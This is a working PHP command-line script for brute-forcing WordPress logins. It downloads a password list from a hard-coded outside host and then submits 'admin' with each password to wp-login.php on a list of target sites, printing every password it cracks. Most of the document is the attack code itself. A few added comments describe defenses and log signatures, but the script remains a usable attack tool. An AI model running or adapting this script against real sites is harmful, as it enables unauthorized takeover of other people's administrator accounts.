WordPress wp-admin Brute Force
<?php
/**
 * Command-line password-guessing script aimed at WordPress login forms.
 *
 * What the code below does, as seen on the wire by the targeted site:
 *  - repeated POST requests to <site>/wp-login.php
 *  - the username field is always the literal "admin" (log=admin)
 *  - each request also carries redirect_to=<site>/wp-admin/ and testcookie=1
 *  - one request per candidate password, sequentially, with no delay between them
 *
 * Defensive takeaways: login throttling or lockout on wp-login.php, a second
 * factor for administrators, and not keeping an account named "admin" all
 * blunt this pattern. A burst of wp-login.php POSTs for one username from a
 * single source is the log signature to alert on.
 *
 * NOTE(review): eregi() was deprecated in PHP 5.3 and removed in PHP 7.0, which
 * dates this script to legacy PHP 5.x environments.
 */
class wp
{
// Declared but never assigned anywhere in this class.
public $site;
// Declared but never assigned anywhere in this class.
public $password;
// Candidate passwords, filled by wordlist().
public $wordlist;
// Target list ("siteler" is Turkish for "sites"), filled by siteler().
public $siteler;
// Pattern searched for in the login response to decide that a guess worked.
// Passed to eregi(), so it is a case-insensitive regex and "." matches any character.
// Presumably chosen because an authenticated dashboard page links to a settings
// page with this name — inferred, not shown here.
public $regex = 'general.php';
/**
 * Downloads the password list from a hard-coded remote URL over plain HTTP
 * and splits it into one entry per line.
 *
 * The outbound fetch of this URL is a network indicator for a host running
 * the script. The result of file_get_contents() is not checked for failure.
 *
 * @return array Lines of the downloaded list (also stored in $this->wordlist).
 */
public function wordlist() {
$liste = file_get_contents("http://afrikanhosting.com/images/wp.txt");
$this->wordlist = explode("\n",$liste);
return $this->wordlist;
}
/**
 * Submits one login attempt to the target's wp-login.php and returns the
 * response body.
 *
 * @param string $site     Base URL of the target, used as-is.
 * @param string $password Candidate password, concatenated into the POST body.
 * @return mixed Whatever curl_exec() returns: the body as a string, or false on failure.
 */
public function curl($site,$password)
{
$curl = curl_init();
// Return the response as a string instead of printing it.
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/wp-login.php");
// Cookies are written to this file in the working directory: a file-system
// artifact on the machine running the script.
curl_setopt($curl,CURLOPT_COOKIEJAR,"megaturks.dat");
// Follow the redirect that a login response may issue, so the returned body is
// that of the final page.
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
// Fixed username "admin"; only the password varies between requests.
// No User-Agent option is set on this handle, so requests likely arrive
// without that header — a cheap detection signal (verify against server logs).
curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$password."&redirect_to=".$site."/wp-admin/&testcookie=1");
$calis = curl_exec($curl);
return $calis;
}
/**
 * Reads the target list from the given path and splits it into one entry per line.
 *
 * @param string $liste Path handed to file_get_contents().
 * @return array Lines of the list (also stored in $this->siteler).
 */
public function siteler($liste)
{
$site = file_get_contents($liste);
$this->siteler = explode("\n",$site); return $this->siteler;
}
/**
 * Main loop: for every target in the list, tries every password from the
 * word list until the response matches $this->regex.
 *
 * @param string $liste Path of the target list, forwarded to siteler().
 * @return void Progress and results are echoed to standard output.
 */
public function burtay($liste)
{
$this->siteler($liste);
foreach($this->siteler as $sites)
{
$site = trim($sites);
// "Denenen Site" = "site being tried".
echo "Denenen Site : " . $site . "\n";
// wordlist() is called here, inside the per-site loop, so the remote list is
// downloaded again for every target.
foreach($this->wordlist() as $sifre)
{
$password = trim($sifre);
// "Denenen Sifre" = "password being tried".
echo "Denenen Sifre " . $password . "\n";
// Success test: case-insensitive regex search for 'general.php' in the
// response body returned by curl().
if ( eregi ($this->regex,$this->curl($site,$password)) )
{
echo "-------------------------------------\n";
// "icin sifre kirildi sifre" = "password cracked for <site>, password:".
echo $site . " icin sifre kirildi sifre : " . $password . "\n" ;
echo "xxx\n";
echo "xxx\n";
echo "-------------------------------------\n";
// Stop guessing for this site and move on to the next one.
break;
}
}
}
}
}
// Script entry point: prints a banner, then runs the guessing loop over the
// target list whose path is the first command-line argument ($argv[1]).
// $argv[1] is used without checking that it was supplied.
echo " ------------------ xxxxx || xxx || ------------------ \n\n ";
$class = new wp(); $class->burtay($argv[1]);
?>
Regards,
Hardeep Singh
(www.fb.com/h4rdeep)